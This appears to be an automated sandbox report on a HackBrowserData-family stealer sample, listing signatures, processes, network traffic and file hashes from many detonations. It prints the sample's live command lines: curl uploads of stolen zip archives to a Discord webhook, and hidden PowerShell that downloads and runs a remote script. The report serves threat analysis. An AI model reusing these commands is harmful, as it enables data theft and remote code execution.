Malware Analysis Report

2025-03-15 00:02

Sample ID 250117-gzv2lsvrcm
Target 9d6b004b06d43ac61aaf4c368987f2c6eef854c6f32cf5286666520ef213f2b7.zip
SHA256 9d6b004b06d43ac61aaf4c368987f2c6eef854c6f32cf5286666520ef213f2b7
Tags
execution hackbrowserdata discovery spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9d6b004b06d43ac61aaf4c368987f2c6eef854c6f32cf5286666520ef213f2b7

Threat Level: Known bad

The file 9d6b004b06d43ac61aaf4c368987f2c6eef854c6f32cf5286666520ef213f2b7.zip was found to be: Known bad.

Malicious Activity Summary

execution hackbrowserdata discovery spyware stealer

An open source browser data exporter written in golang.

Hackbrowserdata family

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Command and Scripting Interpreter: PowerShell

Reads user/profile data of web browsers

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Enumerates physical storage devices

Unsigned PE

Browser Information Discovery

Command and Scripting Interpreter: PowerShell

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-01-17 06:15

Signatures

An open source browser data exporter written in golang.

Description Indicator Process Target
N/A N/A N/A N/A

Hackbrowserdata family

hackbrowserdata

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral10

Detonation Overview

Submitted

2025-01-17 06:15

Reported

2025-01-17 06:17

Platform

win10v2004-20241007-en

Max time kernel

93s

Max time network

146s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\grab.ps1

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3828 wrote to memory of 1908 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\curl.exe
PID 3828 wrote to memory of 1908 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\curl.exe
PID 3828 wrote to memory of 404 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\curl.exe
PID 3828 wrote to memory of 404 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\curl.exe
PID 3828 wrote to memory of 4320 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\curl.exe
PID 3828 wrote to memory of 4320 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\curl.exe
PID 3828 wrote to memory of 4412 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\curl.exe
PID 3828 wrote to memory of 4412 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\curl.exe
PID 3828 wrote to memory of 4952 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\curl.exe
PID 3828 wrote to memory of 4952 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\curl.exe
PID 3828 wrote to memory of 1292 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\curl.exe
PID 3828 wrote to memory of 1292 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\curl.exe
PID 3828 wrote to memory of 4040 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\curl.exe
PID 3828 wrote to memory of 4040 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\curl.exe

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\grab.ps1

C:\Windows\system32\curl.exe

"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\bdata.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n

C:\Windows\system32\curl.exe

"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\e.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n

C:\Windows\system32\curl.exe

"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\exclude.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n

C:\Windows\system32\curl.exe

"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\file.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n

C:\Windows\system32\curl.exe

"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\grab.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n

C:\Windows\system32\curl.exe

"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\m.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n

C:\Windows\system32\curl.exe

"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\svhost.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n

Network

Country Destination Domain Proto
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 232.136.159.162.in-addr.arpa udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 c.pki.goog udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 7.98.22.2.in-addr.arpa udp
GB 142.250.178.3:80 c.pki.goog tcp
US 8.8.8.8:53 3.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 86.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 181.129.81.91.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp

Files

memory/3828-0-0x00007FFDC4013000-0x00007FFDC4015000-memory.dmp

memory/3828-7-0x000001A3DDFE0000-0x000001A3DE002000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ffo1zloo.uww.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3828-11-0x00007FFDC4010000-0x00007FFDC4AD1000-memory.dmp

memory/3828-12-0x00007FFDC4010000-0x00007FFDC4AD1000-memory.dmp

memory/3828-13-0x000001A3DE520000-0x000001A3DE6E2000-memory.dmp

memory/3828-14-0x000001A3DEC20000-0x000001A3DF148000-memory.dmp

memory/3828-15-0x00007FFDC4010000-0x00007FFDC4AD1000-memory.dmp

memory/3828-16-0x00007FFDC4010000-0x00007FFDC4AD1000-memory.dmp

memory/3828-18-0x000001A3C5870000-0x000001A3C587A000-memory.dmp

memory/3828-17-0x000001A3DE070000-0x000001A3DE082000-memory.dmp

memory/3828-20-0x00007FFDC4013000-0x00007FFDC4015000-memory.dmp

memory/3828-21-0x00007FFDC4010000-0x00007FFDC4AD1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\bdata.zip

MD5 e38d77d89d87d9dc6975a8c52049ba18
SHA1 6aee028ef6d2327233466e51dd4c293a28cd43c4
SHA256 658991e9ec65890494a0e7051d41f79f2c7fbba978e64cf577c552d1089f295d
SHA512 ebfaaac981a1189864503526de626ae49de3ded78ab464c31fc441e866e894aca10817c7c96a35ee5d113dfc7aaf3ef619205abe9a4b1fafeb1c2ed9e85bf637

memory/3828-23-0x00007FFDC4010000-0x00007FFDC4AD1000-memory.dmp

memory/3828-24-0x00007FFDC4010000-0x00007FFDC4AD1000-memory.dmp

memory/3828-25-0x00007FFDC4010000-0x00007FFDC4AD1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\e.zip

MD5 9a8e90d4abda1500466b8970c6a36982
SHA1 057b038c0a91654f5a51e45deb94247e0d7c5e3d
SHA256 214b9a2f9f18be94fb5ce10b3e4007099d56df2a9978a2175af9fd98c375b7e2
SHA512 abe05046effb8903a2dcf711ce302a26967e7fa34b9c9488bebaf1aafe0842745488e84417987ab4f2aaffbde8e2dddb4f6116f23124cb5bcfcf3c9c376c1a7e

C:\Users\Admin\AppData\Local\Temp\exclude.zip

MD5 f868c684d24aa6e8c3a1451e00016900
SHA1 b7c2370e5d4d886df82456708d9e9b6553939286
SHA256 ea0301e41e0222f736260bebcdf5250fdd6283854837a6c3356221b554e96244
SHA512 a83e08de2506c61af0fe933265273f05164bcc30e90500c09b518e6b9238330d0cf2db21915b4f4bb0c09f50f41e6b3fcc73a3d883aaa42f4dc60ac4926faa43

C:\Users\Admin\AppData\Local\Temp\file.zip

MD5 7ed554c7a827ba84c1d340fe966a2db9
SHA1 ca39dd825b902a3c853d170312b89a3198e0d67f
SHA256 6d06797176b04baf550c01724281cc1d1ab5b40d18314c00eb3ae767775ca99c
SHA512 0490283cba37a2c2cda88976ada55b81a967c6ccd5373445007f7c72f96205cd33bf54341ab298a077a947da8f4d66c387dc0e1ef0ada99505aac40e66d5187d

C:\Users\Admin\AppData\Local\Temp\grab.zip

MD5 0632e6262f80957d689873cd171ef4eb
SHA1 59ebd357f65af9b6923c93f4a5d2ab959f674ca9
SHA256 5384b0d039f2a3c0a2d0c76aaea6f02f53af13f10d1b059932fbfd686e72f84e
SHA512 54b7e19fb935fc55f2be6ceb6bbe6205f51c299406db83cd9e14472c89f6be0ff33ab1a217c203d3d873b9d0392c09b8fec7f92012d2a91446998b8ab6b0fb69

C:\Users\Admin\AppData\Local\Temp\m.zip

MD5 3e9da8af20794b88518123e7726a1090
SHA1 d41b522d24cb6d0860702d0fd89b12ec6bcbe056
SHA256 c984bc8481dc293ba634a76b05f875feda1adaf346fb5d977ff12d6f284443d6
SHA512 862021501b0af52bc31f1f71d1136eb6dc586f425a586c5e7b3af433d34b3cc7bbfcc5e4e12f0526c4652f972d12518d59075285c40ca968b9930fb74ceefe42

C:\Users\Admin\AppData\Local\Temp\svhost.zip

MD5 2b554843f7216d4fc3966daf6a8d113e
SHA1 ee38847558c8d215357c512d952a3081dd582aea
SHA256 66d56f48c653b00867af782c7fa90e33213270f2c54b9eeb744058fe2f54e17f
SHA512 f258ef8eb692a7e21ab64cfe80f0e27f82706cbbf97d1aeec3b6fbd34855d9b76ba6fb1796c4e9265e7f5e25aa55c1b6026e369a00aebaeab49eec8d5ff57328

memory/3828-40-0x00007FFDC4010000-0x00007FFDC4AD1000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2025-01-17 06:15

Reported

2025-01-17 06:17

Platform

win7-20240903-en

Max time kernel

119s

Max time network

120s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\i965652f-main\svhost.vbs"

Signatures

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\i965652f-main\svhost.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$script = iwr http://raw.githubusercontent.com/k53xupn43/i965652f/refs/heads/main/m.ps1; invoke-expression $script"

Network

N/A

Files

memory/2524-4-0x000007FEF5DDE000-0x000007FEF5DDF000-memory.dmp

memory/2524-5-0x000000001B770000-0x000000001BA52000-memory.dmp

memory/2524-6-0x0000000001E10000-0x0000000001E18000-memory.dmp

memory/2524-7-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp

memory/2524-9-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp

memory/2524-8-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp

memory/2524-11-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp

memory/2524-10-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp

memory/2524-12-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2025-01-17 06:15

Reported

2025-01-17 06:17

Platform

win7-20240729-en

Max time kernel

118s

Max time network

119s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\e.ps1

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\e.ps1

Network

N/A

Files

memory/2564-4-0x000007FEF5D0E000-0x000007FEF5D0F000-memory.dmp

memory/2564-6-0x0000000002240000-0x0000000002248000-memory.dmp

memory/2564-5-0x000000001B610000-0x000000001B8F2000-memory.dmp

memory/2564-7-0x000007FEF5A50000-0x000007FEF63ED000-memory.dmp

memory/2564-8-0x000007FEF5A50000-0x000007FEF63ED000-memory.dmp

memory/2564-9-0x000007FEF5A50000-0x000007FEF63ED000-memory.dmp

memory/2564-10-0x000007FEF5A50000-0x000007FEF63ED000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2025-01-17 06:15

Reported

2025-01-17 06:17

Platform

win7-20240903-en

Max time kernel

119s

Max time network

120s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\i965652f-main\file.bat"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2996 wrote to memory of 2308 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2996 wrote to memory of 2308 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2996 wrote to memory of 2308 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\i965652f-main\file.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-Expression (Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/k53xupn43/i965652f/refs/heads/main/m.ps1').Content"

Network

N/A

Files

memory/2308-4-0x000007FEF5FDE000-0x000007FEF5FDF000-memory.dmp

memory/2308-5-0x000000001B640000-0x000000001B922000-memory.dmp

memory/2308-9-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

memory/2308-8-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

memory/2308-7-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

memory/2308-6-0x0000000001D90000-0x0000000001D98000-memory.dmp

memory/2308-11-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

memory/2308-10-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

memory/2308-12-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2025-01-17 06:15

Reported

2025-01-17 06:17

Platform

win10v2004-20241007-en

Max time kernel

140s

Max time network

150s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\i965652f-main\file.bat"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3156 wrote to memory of 4744 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3156 wrote to memory of 4744 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\i965652f-main\file.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-Expression (Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/k53xupn43/i965652f/refs/heads/main/m.ps1').Content"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
IN 64.227.161.180:4443 tcp
US 8.8.8.8:53 180.129.81.91.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 7.98.22.2.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
IN 64.227.161.180:4443 tcp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
IN 64.227.161.180:4443 tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
IN 64.227.161.180:4443 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
IN 64.227.161.180:4443 tcp
IN 64.227.161.180:4443 tcp
IN 64.227.161.180:4443 tcp

Files

memory/4744-0-0x00007FFE43D43000-0x00007FFE43D45000-memory.dmp

memory/4744-6-0x000001F6B9E50000-0x000001F6B9E72000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mrz2raz5.qay.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4744-11-0x00007FFE43D40000-0x00007FFE44801000-memory.dmp

memory/4744-12-0x00007FFE43D40000-0x00007FFE44801000-memory.dmp

memory/4744-13-0x000001F6BCC30000-0x000001F6BD3D6000-memory.dmp

memory/4744-15-0x00007FFE43D43000-0x00007FFE43D45000-memory.dmp

memory/4744-16-0x00007FFE43D40000-0x00007FFE44801000-memory.dmp

memory/4744-17-0x00007FFE43D40000-0x00007FFE44801000-memory.dmp

memory/4744-18-0x00007FFE43D40000-0x00007FFE44801000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2025-01-17 06:15

Reported

2025-01-17 06:17

Platform

win7-20240903-en

Max time kernel

118s

Max time network

119s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\grab.ps1

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\grab.ps1

Network

N/A

Files

memory/2072-4-0x000007FEF5FDE000-0x000007FEF5FDF000-memory.dmp

memory/2072-5-0x000000001B820000-0x000000001BB02000-memory.dmp

memory/2072-6-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

memory/2072-7-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

memory/2072-8-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

memory/2072-9-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

memory/2072-11-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

memory/2072-10-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2025-01-17 06:15

Reported

2025-01-17 06:17

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

150s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\m.ps1

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\m.ps1

Network

Country Destination Domain Proto
IN 64.227.161.180:4443 tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 7.98.22.2.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
IN 64.227.161.180:4443 tcp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 85.49.80.91.in-addr.arpa udp
IN 64.227.161.180:4443 tcp
US 8.8.8.8:53 180.129.81.91.in-addr.arpa udp
IN 64.227.161.180:4443 tcp
US 8.8.8.8:53 181.129.81.91.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
IN 64.227.161.180:4443 tcp
IN 64.227.161.180:4443 tcp
US 8.8.8.8:53 34.197.79.40.in-addr.arpa udp

Files

memory/4472-0-0x00007FFCD9873000-0x00007FFCD9875000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_42ttdnm0.inb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4472-10-0x000001C9EFD50000-0x000001C9EFD72000-memory.dmp

memory/4472-11-0x00007FFCD9870000-0x00007FFCDA331000-memory.dmp

memory/4472-12-0x00007FFCD9870000-0x00007FFCDA331000-memory.dmp

memory/4472-13-0x00007FFCD9870000-0x00007FFCDA331000-memory.dmp

memory/4472-14-0x00007FFCD9870000-0x00007FFCDA331000-memory.dmp

memory/4472-15-0x00007FFCD9870000-0x00007FFCDA331000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2025-01-17 06:15

Reported

2025-01-17 06:17

Platform

win10v2004-20241007-en

Max time kernel

140s

Max time network

147s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\i965652f-main\svhost.vbs"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3240 wrote to memory of 1672 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3240 wrote to memory of 1672 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\System32\WScript.exe

